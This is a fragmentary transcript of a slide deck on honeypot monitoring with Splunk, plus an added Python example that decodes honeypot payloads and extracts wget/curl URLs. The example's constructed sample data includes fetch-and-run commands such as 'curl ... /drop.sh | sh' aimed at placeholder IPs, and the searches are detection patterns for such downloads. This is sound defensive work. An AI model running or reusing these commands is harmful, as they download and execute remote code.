Honeypot Monitoring with Splunk (Splunkによるハニーポット監視.pdf)

sec-chick
September 30, 2018


Transcript

  1. SPLUNK
    SEC-CHICK

  2. WHO AM I
    sec-chick (@one_sec_chick)
    • WoW Honeypot, Honeytrap


  3. (no transcript text)



  4. Splunk
    WoWHoneypot
    Honeytrap
    PC
    VPS
    SSH
    • Splunk

  5. SPLUNK
    • Splunk
    http://www.intellilink.co.jp/pd/products/package/security/splunk.html




  6. • WoWHoneypot

  7. • Honeytrap

  8.
    1. SSH
    2. Splunk
    3. Splunk
    4.
    5. HEX

  9. Attack_connection.local_port


  10. Attack_connection.payload.data_hex
    Hex

  11. (no transcript text)

  12. 1. Docker
    2.
    3. Splunk
    4. Suricata

  13. DOCKER
    • Docker

  14.
    • Docker
    • cron
    Splunk
    WoWHoneypot
    Honeytrap
    VPS
    Honeypot
    Docker

  15. Splunk
    WoWHoneypot
    Honeytrap
    VPS
    Honeypot
    Docker

  16. SPLUNK
    → Grep
    → URL
    → VirusTotal

  17. WOWHONEYPOT
    | rex field=_raw
      "\"(?<g1>[^\s]+)\s(?<g2>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
    | decrypt field="base64_wow" atob emit('base64_wow_decrypted')
    | eval decode=urldecode(base64_wow_decrypted)
    | rex field="decode" "wget.+(?<wget_url>https?://[\w/:\.\-]+?)\s"
    | rex field="decode" "curl.+(?<curl_url>https?://[\w/:\.\-]+?)\s"
    (The names inside the (?<...>) capture groups were stripped from the transcript; base64_wow is the only one recoverable, from the decrypt line. g1, g2, wget_url and curl_url are placeholders. decrypt is the Decrypt add-on's command, not core SPL.)

  18. HONEYTRAP
    | decrypt field="attack_connection.payload.data_hex" unhex
      emit('attack_connection.payload.data_decrypted')
    | rex field="attack_connection.payload.data_decrypted"
      "wget.+(?<wget_url>https?://[\w/:\.\-]+?)\s"
    | rex field="attack_connection.payload.data_decrypted"
      "curl.+(?<curl_url>https?://[\w/:\.\-]+?)\s"
    (wget_url and curl_url are placeholder group names; the originals were stripped from the transcript.)
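The two searches above decode a WoWHoneypot request (base64, then URL-decoding) and a Honeytrap payload (hex) and pull the wget/curl download URLs out of the result. The following Python does the same outside Splunk, as an added example that is not part of the deck; the WoWHoneypot line layout, the Honeytrap event keys other than attack_connection.payload.data_hex, and the sample data are constructed assumptions. It goes slightly beyond the slides' rex by also ending a URL at ; | & or a quote, which the whitespace-terminated pattern misses.

```python
import base64
import re
from urllib.parse import unquote_plus

# Download URLs handed to wget/curl, modelled on the slides' rex
# "wget.+(?<url>https?://[\w/:\.\-]+?)\s". That pattern needs whitespace
# after the URL; this one also stops at ; | & and quotes.
URL_RE = re.compile(
    r"(?:wget|curl)[^\r\n]*?(https?://[\w/:.\-]+?)(?=[\s;|&'\"]|$)")

def extract_urls(text):
    """Return every wget/curl target URL found in a decoded payload."""
    return URL_RE.findall(text)

def decode_wow_line(line):
    """WoWHoneypot access_log line (assumed layout): whitespace-separated
    fields whose last token is the base64 of the raw HTTP request, the
    field the slide names base64_wow. Same as atob + urldecode in the SPL."""
    b64 = line.split()[-1]
    raw = base64.b64decode(b64).decode("utf-8", errors="replace")
    return unquote_plus(raw)

def decode_honeytrap_event(event):
    """Honeytrap event (parsed JSON): attack_connection.payload.data_hex is
    the captured payload as hex, as on the slides. Same as decrypt ... unhex."""
    hex_payload = event["attack_connection"]["payload"]["data_hex"]
    return bytes.fromhex(hex_payload).decode("utf-8", errors="replace")

# Constructed sample data using documentation address ranges, not real captures.
WOW_REQUEST = (b"GET /cgi-bin/test?cmd=wget+http://198.51.100.7/bins/test.sh "
               b"HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n")
WOW_LINE = ("[2018-09-30 10:00:00+0900] 192.0.2.10 51234 203.0.113.5 8080 "
            + base64.b64encode(WOW_REQUEST).decode())
TRAP_PAYLOAD = b"cmd=curl http://203.0.113.9:8080/drop.sh | sh\n"
TRAP_EVENT = {"attack_connection": {"local_port": 8080,
                                    "payload": {"data_hex": TRAP_PAYLOAD.hex()}}}

def wow_urls():
    return extract_urls(decode_wow_line(WOW_LINE))

def honeytrap_urls():
    return extract_urls(decode_honeytrap_event(TRAP_EVENT))

if __name__ == "__main__":
    print(wow_urls())        # ['http://198.51.100.7/bins/test.sh']
    print(honeytrap_urls())  # ['http://203.0.113.9:8080/drop.sh']
```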

  19. HONEYTRAP

  20. SURICATA
    • Grep
    • Suricata


  21.
    • @Sec_S_Owl
    • @cactus_pots
    • @SugitaMuchi
    • @soji256
    • @morihi_soc
    Twitter
    Slack
    http://goo.gl/8bLkZA

  22. (no transcript text)

  23.
    • Splunk